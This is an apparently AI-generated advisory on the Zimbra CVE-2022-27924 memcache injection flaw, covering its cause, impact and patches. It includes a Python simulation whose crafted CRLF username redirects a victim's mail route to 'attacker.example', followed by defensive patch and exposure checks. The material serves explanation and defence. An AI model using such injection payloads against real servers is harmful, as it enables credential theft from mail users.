CVE-2022-27924
Zimbra Collaboration Server vulnerability analysis and mitigation

Overview

Zimbra Collaboration (aka ZCS) versions 8.8.15 and 9.0 contained a high-severity vulnerability (CVE-2022-27924) that allowed an unauthenticated attacker to inject arbitrary memcache commands into a targeted instance. The vulnerability was discovered by SonarSource researchers in March 2022 and patched by Zimbra in May 2022 with versions 8.8.15 Patch 31.1 and 9.0.0 Patch 24.1 (Sonar Blog, Zimbra Advisory).

Technical details

The vulnerability arose because newline characters in untrusted user input were not escaped before that input was embedded in Memcached commands. Memcached's text protocol treats each CRLF-terminated line as a separate command, so an attacker who placed a CRLF in the input (in Sonar's analysis, a username supplied during a mail-client login) could append arbitrary commands to the protocol stream. Because those injected commands reached Memcached unescaped, they were executed as genuine requests and could overwrite arbitrary cached entries. The vulnerability received a CVSS v3.1 base score of 7.5 HIGH (Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) (NVD, CISA Advisory).
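The following is an added example, not Zimbra's code or Sonar's proof of concept. It models memcached text-protocol command construction to show how an unescaped CR/LF in attacker-controlled input smuggles extra commands into the stream, next to a hardened builder that rejects such input. The key layout "route:proto=imap;user=<name>" mapping to "backend-host:port", the backend names, and the attacker input are assumptions constructed for the demo, not Zimbra's real cache format.

```python
"""Added example (not Zimbra's code): memcached command injection via an
unescaped CRLF in a user-supplied name, beside the hardened construction.

The key layout "route:proto=imap;user=<name>" -> "backend-host:port" is an
assumed, simplified stand-in for a proxy route cache, not Zimbra's real format.
"""
import re


def build_set_cmd(key: str, value: str, ttl: int = 3600) -> bytes:
    """memcached text protocol: 'set <key> <flags> <exptime> <bytes>\\r\\n<data>\\r\\n'."""
    data = value.encode()
    return f"set {key} 0 {ttl} {len(data)}\r\n".encode() + data + b"\r\n"


def vulnerable_route_set(username: str, backend: str) -> bytes:
    """Vulnerable: the username is spliced into the key with no line-break check."""
    return build_set_cmd(f"route:proto=imap;user={username}", backend)


# memcached keys may not contain control characters or spaces (max 250 bytes).
_BAD_KEY_CHARS = re.compile(r"[\x00-\x20\x7f]")


def hardened_route_set(username: str, backend: str) -> bytes:
    """Fixed: refuse any username that could terminate or split the command line."""
    if _BAD_KEY_CHARS.search(username) or len(username.encode()) > 200:
        raise ValueError("username contains characters not allowed in a cache key")
    return build_set_cmd(f"route:proto=imap;user={username}", backend)


def is_rejected(username: str) -> bool:
    """True if the hardened builder refuses this username."""
    try:
        hardened_route_set(username, "mail1.internal:7143")
        return False
    except ValueError:
        return True


def apply_stream(stream: bytes, cache: dict) -> dict:
    """Model of how a memcached server consumes a command stream: one command per
    CRLF-terminated line, with exactly <bytes> of data after each 'set'. A line it
    cannot parse is answered with ERROR and skipped, and reading continues with
    the next line, which is what makes the injection work."""
    lines = stream.split(b"\r\n")
    i = 0
    while i < len(lines):
        parts = lines[i].split(b" ")
        if parts[0] == b"set" and len(parts) >= 5 and parts[4].isdigit() and i + 1 < len(lines):
            key, nbytes = parts[1].decode(), int(parts[4])
            data = lines[i + 1]
            if len(data) == nbytes:  # a real server replies CLIENT_ERROR otherwise
                cache[key] = data.decode()
            i += 2
        else:
            i += 1
    return cache


# Constructed attacker input: the CRLF ends the legitimate key line, then two
# complete 'set' commands follow. The second one swallows the server's own
# trailing data line so the stream stays well-formed.
INJECTED_USERNAME = (
    "x\r\n"
    "set route:proto=imap;user=victim 0 3600 20\r\n"
    "attacker.example:143\r\n"
    "set dummy"
)


def demo() -> dict:
    """Replay a legitimate lookup and then the injected one; return the cache."""
    cache = {}
    apply_stream(vulnerable_route_set("alice", "mail1.internal:7143"), cache)
    apply_stream(vulnerable_route_set(INJECTED_USERNAME, "mail1.internal:7143"), cache)
    return cache


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k} -> {v}")
    print("hardened rejects injected username:", is_rejected(INJECTED_USERNAME))
```

After the replay, the cache holds a route for "victim" that points at the attacker's host even though the server only ever intended to store a route for "alice"; the hardened builder raises on the same input because the CRLF never reaches the protocol stream.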

Impact

When successfully exploited, the vulnerability let an attacker steal cleartext email account credentials from users of a targeted Zimbra instance without any user interaction: by overwriting the cached mail-routing entry for a target user, the attacker could cause Zimbra's proxy to forward that user's next IMAP login to an attacker-controlled host, which then received the credentials in the clear. In environments not enforcing multifactor authentication (MFA), the stolen credentials could be used for spear phishing, social engineering, and business email compromise (BEC) attacks. Additionally, attackers could use the credentials to deploy webshells and maintain persistent access (CISA Advisory).

Mitigation and workarounds

Organizations were strongly advised to upgrade to Zimbra versions 8.8.15 Patch 31.1 or 9.0.0 Patch 24.1 or later. Additional recommended mitigations included blocking internet traffic to Zimbra servers where possible and configuring Zimbra to block external Memcached access, even on patched versions. Organizations that did not immediately patch upon release, or whose ZCS instances were exposed to the internet, were advised to assume compromise and hunt for malicious activity (CISA Advisory).
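Two quick checks a responder can run against the numbers above, as an added example that is not from the CISA advisory or from Zimbra: whether a reported version and patch label is at or beyond the fixed level (note that 8.8.15 P31 is still vulnerable, because the fix shipped in P31.1), and whether a host's listener table shows Memcached bound to anything other than loopback. The version and patch string layout accepted here and the sample `ss -ltn` lines are assumptions constructed for the demo.

```python
"""Added example (not from the CISA advisory or Zimbra): patch-level and
memcached-exposure checks for CVE-2022-27924.

The fixed patch levels come from the advisory; the "8.8.15" / "P31.1" string
layout accepted by is_patched() and the sample listener table are assumptions.
"""
import re

# First patch levels that contain the fix for CVE-2022-27924.
FIXED_PATCH = {"8.8.15": (31, 1), "9.0.0": (24, 1)}


def parse_patch(patch: str) -> tuple:
    """'P31' -> (31, 0); 'P31.1' -> (31, 1). Raises on anything else."""
    m = re.fullmatch(r"P(\d+)(?:\.(\d+))?", patch.strip())
    if not m:
        raise ValueError(f"unrecognised patch label: {patch!r}")
    return (int(m.group(1)), int(m.group(2) or 0))


def is_patched(version: str, patch: str) -> bool:
    """True if version/patch is at or beyond the fixed level.
    Versions not in the table are treated as unpatched (fail closed)."""
    fixed = FIXED_PATCH.get(version.strip())
    if fixed is None:
        return False
    return parse_patch(patch) >= fixed


LOOPBACK = {"127.0.0.1", "[::1]", "::1"}
MEMCACHED_PORT = "11211"


def exposed_memcached_listeners(ss_output: str) -> list:
    """Return local address:port of TCP listeners on 11211 that are not loopback-only.
    Expects lines shaped like `ss -ltn` output: State Recv-Q Send-Q Local Peer."""
    exposed = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        local = fields[3]
        addr, _, port = local.rpartition(":")
        if port == MEMCACHED_PORT and addr not in LOOPBACK:
            exposed.append(local)
    return exposed


# Constructed sample listener table (not captured from a real host).
SAMPLE_SS = """State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      1024   0.0.0.0:11211       0.0.0.0:*
LISTEN 0      1024   127.0.0.1:7025      0.0.0.0:*
LISTEN 0      1024   [::1]:11211         [::]:*
"""

if __name__ == "__main__":
    for v, p in [("8.8.15", "P31"), ("8.8.15", "P31.1"), ("9.0.0", "P25")]:
        print(v, p, "patched" if is_patched(v, p) else "VULNERABLE")
    print("exposed memcached listeners:", exposed_memcached_listeners(SAMPLE_SS))
```

On a live host, feed the output of `ss -ltn` to `exposed_memcached_listeners()`; any entry it returns is a listener that firewall rules or the Memcached bind configuration should restrict to localhost.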

Community reactions

Due to the severity and active exploitation of the vulnerability, CISA added CVE-2022-27924 to its Known Exploited Vulnerabilities Catalog on August 4, 2022, requiring federal agencies to patch by August 25, 2022 (CISA Advisory).

This report was generated using AI.
